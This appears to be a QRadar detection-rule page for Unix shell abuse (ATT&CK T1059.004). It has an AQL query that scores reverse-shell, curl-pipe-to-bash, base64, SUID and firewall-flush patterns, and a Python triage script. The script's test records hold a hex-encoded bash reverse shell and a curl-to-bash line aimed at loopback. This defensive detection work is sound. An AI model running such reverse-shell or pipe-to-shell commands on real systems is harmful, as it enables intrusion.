T1059.004 IBM QRadar · QRadar

Detect Unix Shell in IBM QRadar

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations exist (sh, ash, bash, zsh, etc.). Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Adversaries may abuse Unix shells to execute various commands or payloads, access interactive shells through C2 channels, leverage shell scripts for persistence, or use stripped-down shells via Busybox on embedded devices and ESXi servers.

MITRE ATT&CK

Tactic
Execution
Technique
T1059 Command and Scripting Interpreter
Sub-technique
T1059.004 Unix Shell
Canonical reference
https://attack.mitre.org/techniques/T1059/004/

QRadar Detection Query

IBM QRadar (QRadar)

SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  username,
  LOGSOURCENAME(logsourceid) AS log_source,
  CATEGORYNAME(category) AS category_name,
  "Process Name",
  "Command",
  CASE
    WHEN "Command" ILIKE '%/dev/tcp/%' OR "Command" ILIKE '%/dev/udp/%' OR "Command" ILIKE '%nc -e /bin/%' OR "Command" ILIKE '%ncat -e%' OR "Command" ILIKE '%socat exec:%' OR "Command" ILIKE '%mkfifo /tmp/%' OR "Command" ILIKE '%python%import socket%' OR "Command" ILIKE '%perl -e%use Socket%' THEN 3
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%curl%|%bash%' OR "Command" ILIKE '%curl%|%sh%' OR "Command" ILIKE '%wget%|%bash%' OR "Command" ILIKE '%wget%|%sh%' THEN 2
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%base64 -d%' OR "Command" ILIKE '%base64 --decode%' THEN 1
    ELSE 0
  END +
  CASE
    WHEN "Command" ILIKE '%chmod +s%' OR "Command" ILIKE '%chmod 4755%' OR "Command" ILIKE '%useradd%' OR "Command" ILIKE '%usermod -aG%' OR "Command" ILIKE '%iptables -F%' THEN 2
    ELSE 0
  END AS suspicion_score
FROM events
WHERE
  LOGSOURCETYPEID IN (13, 14, 105, 191)
  AND ("Process Name" ILIKE '%bash%' OR "Process Name" ILIKE '%/bin/sh%' OR "Process Name" ILIKE '%zsh%' OR "Process Name" ILIKE '%dash%' OR "Process Name" ILIKE '%busybox%')
  AND (
    "Command" ILIKE '%/dev/tcp/%' OR
    "Command" ILIKE '%/dev/udp/%' OR
    "Command" ILIKE '%nc -e /bin/%' OR
    "Command" ILIKE '%ncat -e%' OR
    "Command" ILIKE '%socat exec:%' OR
    "Command" ILIKE '%curl%|%bash%' OR
    "Command" ILIKE '%wget%|%bash%' OR
    "Command" ILIKE '%base64 -d%' OR
    "Command" ILIKE '%base64 --decode%' OR
    "Command" ILIKE '%mkfifo /tmp/%' OR
    "Command" ILIKE '%chmod +s%' OR
    "Command" ILIKE '%chmod 4755%' OR
    "Command" ILIKE '%useradd%' OR
    "Command" ILIKE '%usermod -aG%' OR
    "Command" ILIKE '%iptables -F%' OR
    "Command" ILIKE '%python%import socket%' OR
    "Command" ILIKE '%perl -e%use Socket%'
  )
ORDER BY suspicion_score DESC, starttime DESC
LAST 1 DAYS

Severity
high
Confidence
medium

Detects suspicious Unix shell commands across Linux syslog and auditd log sources. Applies a weighted suspicion score (reverse shell=3, pipe-to-shell=2, privilege escalation=2, base64=1) and surfaces events with any non-zero score. Covers /dev/tcp reverse shells, netcat/socat, curl/wget pipe execution, base64 payload decoding, SUID manipulation, and firewall flush.

Data Sources

  • Linux OS (syslog)
  • Linux auditd (LOGSOURCETYPEID 105)
  • Unix Authentication (LOGSOURCETYPEID 13)
  • Syslog (LOGSOURCETYPEID 14)

Required Tables

events

False Positives & Tuning

  • Legitimate bootstrap scripts in CI/CD environments that use curl | bash to install build agents or language runtimes
  • Security teams running authorized red team exercises that deliberately trigger these patterns as part of purple team testing
  • System hardening scripts that flush and rebuild iptables rules during scheduled maintenance windows

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Bash Reverse Shell via /dev/tcp

    Expected signal: Auditd: EXECVE record for bash with /dev/tcp in arguments. Syslog: bash process creation. Network connection attempt to 127.0.0.1:4444 (will fail without listener). MDE DeviceProcessEvents on managed Linux endpoints.

  2. Test 2: Curl Pipe to Bash

    Expected signal: Auditd: EXECVE records for curl and bash. Process tree shows curl piped to bash. Network connection attempt to 127.0.0.1:8080 (will fail without listener). The curl failure means no content reaches bash.

  3. Test 3: Base64 Encoded Command Execution

    Expected signal: Auditd: EXECVE records for echo, base64, and bash. The decoded content 'whoami' will be executed. Syslog captures the process chain.
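As an added example (not part of this page's detection package or of QRadar), the query's scoring logic re-implemented in Python over constructed auditd EXECVE records that correspond to the three tests above, so the score each test should produce can be checked offline before the rule is deployed. The process-name gate and the four weight classes follow the query, and every pattern the WHERE clause matches (including /dev/udp, mkfifo, python/perl sockets and iptables -F) is scored so that no gated event is dropped; the records, timestamps and loopback addresses are constructed.

```python
import re

# Pattern groups and weights mirror the query's suspicion_score column: the AQL
# '%' wildcard becomes '.*' and ILIKE becomes a case-insensitive search.
SCORE_GROUPS = [
    (3, [r"/dev/tcp/", r"/dev/udp/", r"nc -e /bin/", r"ncat -e", r"socat exec:",
         r"mkfifo /tmp/", r"python.*import socket", r"perl -e.*use Socket"]),
    (2, [r"curl.*\|.*bash", r"curl.*\|.*sh", r"wget.*\|.*bash", r"wget.*\|.*sh"]),
    (1, [r"base64 -d", r"base64 --decode"]),
    (2, [r"chmod \+s", r"chmod 4755", r"useradd", r"usermod -aG", r"iptables -F"]),
]
SHELLS = ("bash", "/bin/sh", "zsh", "dash", "busybox")  # the "Process Name" gate
# a0="quoted" or a0=HEX: auditd hex-encodes argv elements containing spaces or quotes.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def parse_execve(record: str) -> tuple[str, str]:
    """Return (argv[0], reconstructed command line) from one auditd EXECVE record."""
    argv = []
    for idx, quoted, hexed in ARG_RE.findall(record):
        argv.append((int(idx), quoted or bytes.fromhex(hexed).decode("utf-8", "replace")))
    argv = [v for _, v in sorted(argv)]
    return (argv[0] if argv else ""), " ".join(argv)

def suspicion_score(command: str) -> int:
    """Sum the group weights, one hit per group, exactly as the CASE blocks add up."""
    return sum(w for w, pats in SCORE_GROUPS
               if any(re.search(p, command, re.IGNORECASE) for p in pats))

def triage(records: list[str]) -> list[tuple[int, str]]:
    """Apply the shell gate and scoring; return (score, command) pairs, highest first."""
    hits = []
    for rec in records:
        argv0, cmd = parse_execve(rec)
        score = suspicion_score(cmd) if any(s in argv0.lower() for s in SHELLS) else 0
        if score > 0:
            hits.append((score, cmd))
    return sorted(hits, key=lambda h: h[0], reverse=True)

# Constructed records for the three tests, a benign shell command and a non-shell process.
SAMPLE_RECORDS = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="bash" a1="-c" '
    'a2=62617368202D69203E26202F6465762F7463702F3132372E302E302E312F3434343420303E2631',
    'type=EXECVE msg=audit(1700000000.102:202): argc=3 a0="bash" a1="-c" '
    'a2="curl http://127.0.0.1:8080/setup.sh | bash"',
    'type=EXECVE msg=audit(1700000000.103:203): argc=3 a0="bash" a1="-c" '
    'a2="echo d2hvYW1p | base64 -d | bash"',
    'type=EXECVE msg=audit(1700000000.104:204): argc=3 a0="bash" a1="-c" a2="ls -la /tmp"',
    'type=EXECVE msg=audit(1700000000.105:205): argc=2 a0="curl" a1="http://127.0.0.1:8080/setup.sh"',
]
```

Running triage(SAMPLE_RECORDS) yields the three test commands with scores 3, 2 and 1; the benign command scores 0 and the curl process is dropped by the shell gate, which matches what the query's WHERE clause and suspicion_score column should return for the same events.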
